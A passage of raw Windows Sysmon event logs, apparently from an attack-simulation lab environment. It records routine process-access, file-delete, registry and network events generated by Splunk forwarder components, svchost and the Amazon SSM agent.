07:56:03.194{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B393-615A-F401-00000000FC01}6864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.194{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B393-615A-F401-00000000FC01}6864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:03.195{58E9C193-B393-615A-F401-00000000FC01}6864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082361Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:04.893{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3D8797846362EE702C6FFA760D59F7E,SHA256=721C486CE3613EA6A6DE97CA5C931FDED5DC84C1DEF17DD628EA179B8BED36CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:04.897{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BAF00B7F0AFE3E1A19A11C6478C22D4,SHA256=3AB50A08CF47DF5B04C5BD3D368E98BF2D397337D74A5C8C95FD17985FD2ACE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:04.335{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C6A919277114925289DE54F043EC2AB,SHA256=7DEBF66CCF621060E9684ED5449921D435E5D73E1EADBF044F18E3E7FF85E349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082360Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:04.279{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-028MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:04.163{58E9C193-B393-615A-F501-00000000FC01}46084680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082363Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:05.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0EF51C5ABCB64E56C8F038DE36C67D0,SHA256=B8E3F6D1C34472DBE87197B34E33A1347C98D9CE14B9191140E8FBF237A33462,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:04.420{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49604-false10.0.1.12-8000- 10341000x8000000000000000104492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B395-615A-F601-00000000FC01}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFBA2030484EBC2125B900FCCF964DFB,SHA256=4BE94DE889D09DFB7F63A18FC80703B559A936AED044D6D08532C3D751134025,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B395-615A-F601-00000000FC01}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.335{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B395-615A-F601-00000000FC01}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:05.336{58E9C193-B395-615A-F601-00000000FC01}408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082362Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:05.284{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-029MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082364Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:06.940{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A988371C88D57D1586CAA438222A6C9,SHA256=D278B5DC53CF6939EDCF8CAAEA537A16DFA902FA36C0C8443F666A1E0255B0AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:06.413{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BAD7A2D6A32B837954E84902BF98DED,SHA256=1FDD8026FF5C0FB67BE7391EF1F89DCAA40F586F6A43825BAE403EE1FE3A3C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:06.335{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74F2FCCBBB2EC69682FA630F874EA728,SHA256=9BB9C329E596978A5041E37E4CCF686DE5360DB5102AF2D59517DAF5A2068A92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:07.429{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C9EA58715D9ADA584BB1A0A41359E3E,SHA256=34A6635F5CB2395E2B8CC930F57F61A81126B8FC34C09B243D651E558488EF2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082365Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:05.712{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50092-false10.0.1.12-8000- 23542300x8000000000000000104498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:08.429{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA0E2E9BF522B5D967ECBBC4E12E8A68,SHA256=559EB173CF61934EAEBDA45878DA96A6BBF7CD7BC5027812A88D4C3D137E9570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082366Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:08.111{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8772EC518BC3D8676E2E0E26D74A6851,SHA256=A10AF9A7418311C3F125C5443BCBF9F8BCED054D00602E775FC0775564D73FC3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000104497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:56:08.085{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f5-0x4a206686) 23542300x8000000000000000104499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:09.445{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B764CD6B15A6781597BCCEAD3C032AE,SHA256=700AF41B10760BF9D531E2F90188B9DC4518DC08CD43512AA91F7EF244DDBA2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082367Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:09.190{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88790949AF760C125D5C2C196D4C6DE,SHA256=06F41017D634FE80FF8B67B54315E36413ED963EBB3F63BB9A21203385676675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:10.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9338A84B97F978517DDFF5F001F9FE,SHA256=A246220C64ECF78FBA54F21A7279BA2BC6C844B1429EE8E5E0D06729F6E7ADBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082368Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:10.408{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0283CE9E7D7322951007C89FE7E736B,SHA256=814365D6464FF3006AE2613650C1046EADFF5BC8F593E153CFC83C76D0708B0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082369Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:11.440{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B44931345B265E025A876A9703DC382,SHA256=B68A640BDCA1045A8DAD0C160116F032627BD816CC42966D0C53A1A596222589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:11.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B6125BFA42A3739E85CCA967C5A586,SHA256=78C2795DAB94646C9503ADE83AA8E13DA7227EB7F82A3C6D7D411AD119524BCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082371Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:12.440{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB47CAADE185A700F561BD158BA48E1C,SHA256=13FDC8D66B20F1228E1C471D3E4CC0C0E6EE00B5C6F03A343B1DF820A92201E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:12.476{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB007644CECE4FAE77FF0D11E465E599,SHA256=E90FEF6312BBDD812F6CA684818AF68B386B6886244493746431A6B064444ACD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000082370Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:56:12.221{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f5-0x4c978365) 354300x8000000000000000104502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:10.342{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49605-false10.0.1.12-8000- 23542300x800000000000000082373Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:13.471{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99055EEA8277BD5EC4B4B6A72E2896B4,SHA256=4326A770E6582BDB623790110CD4F1C8E4F8A45C7C6F01BF923191EE9C9CEEF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 